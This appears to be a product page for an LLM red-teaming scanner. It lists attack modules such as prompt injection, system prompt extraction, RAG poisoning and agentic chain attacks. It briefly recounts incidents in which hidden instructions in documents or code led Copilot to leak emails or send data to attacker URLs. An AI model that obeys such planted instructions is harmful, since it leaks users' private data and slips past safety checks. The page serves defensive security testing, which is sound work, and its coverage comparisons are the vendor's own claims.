Every attack module explained -- what it is, how it works, real-world incidents, and how to defend against it. Covers the full attack chain from model layer through API layer through agentic pipelines.
Matches or exceeds on all LLM model-layer tests. Adds API security, injection probing, agentic chain attacks, and embedding leakage that Garak does not cover.
Matches on OWASP LLM Top 10. Adds model identity fingerprinting, agentic chain, EchoLeak/Copilot CVE tests, and full injection probing. Promptfoo adds BOLA/BFLA which requires multi-token auth.
Adds full LLM model-layer and agentic testing Akto lacks. Adds API-layer tests PyRIT lacks. Only gap vs PyRIT is LLM-as-judge scoring -- we use regex, PyRIT uses a second model call.
Hidden instructions in a shared document caused Copilot to return the user private recent emails when asked for a summary. No click, no download -- just a question to an AI assistant. Module: Embedding & RAG Leakage.
A markdown image tag hidden in a source code file caused Copilot to send sensitive data to an attacker-controlled URL. 10M+ developers in scope. Module: Embedding & RAG Leakage.
SQL injection delivered through an AI chatbot interface reached a backend database. $20 and 2 hours to full breach. Module: Injection Probing.
Malicious instructions injected into agent A propagate to agent B in automated pipelines, bypassing per-agent safety checks. Module: Agentic Chain Attacks.
All 10 categories covered across the 16 attack modules.
11 variants - direct, indirect, RAG pipeline, tool output injection
Learn more -->PII leakage, credential extraction, PHI inference, exfiltration via code
Learn more -->Third-party plugin hijacking, model provenance, malicious tool substitution
Learn more -->Knowledge base injection, malicious context influence
Learn more -->Exfiltration code, JS cookie theft, markdown pixels, DNS channels
Learn more -->Agentic privilege escalation, unauthorized tool invocation, scope creep injection
Learn more -->6 extraction vectors - translation, token completion, persona-based
Learn more -->RAG poisoning, indirect injection, EchoLeak cross-context leakage, Copilot image tag injection, embedding inversion
Learn more -->False fact assertion, hallucination amplification, disinformation
Learn more -->Jailbreaks, model extraction, fingerprinting, resource exhaustion
Learn more -->Six additional modules beyond OWASP LLM Top 10 -- API security, injection attacks, toxicity, model identity, agentic pipelines, and embedding leakage.
Rate limiting, CORS misconfiguration, verbose error disclosure, auth header bypass, HTTP method confusion, response metadata leakage. Covers the API layer around your LLM -- the attack surface that brought down McKinsey.
SQL injection via chat interface, NoSQL operator injection, OS command injection, server-side template injection, path traversal, and SSRF via chatbot -- the full McKinsey infrastructure attack chain delivered through the model layer.
Hate speech generation, self-harm facilitation, targeted harassment, dangerous medical misinformation, radicalization content, and harmful synthesis instructions via roleplay framing. Closes the Garak toxicity testing gap.
Base model fingerprinting, training data extraction, fine-tuning detection, version enumeration, behavioral fingerprinting via response patterns, and token probability probing. Critical for organizations that must not reveal which LLM powers their product.
Cross-agent instruction injection, tool output poisoning, privilege escalation via agent delegation, persistent memory poisoning, and recursive agent loop exploitation. The next frontier of prompt injection in multi-agent pipelines.
Includes specific tests for EchoLeak (CVE-2025-32711, CVSS 9.3) and GitHub Copilot source code injection (CVE-2025-53773, CVSS 9.6). Also covers RAG document reconstruction, embedding inversion, cross-user context leakage, and semantic memory extraction.
110+ real adversarial tests including EchoLeak and GitHub Copilot CVE vectors. No account. No data stored.
Run free scan -->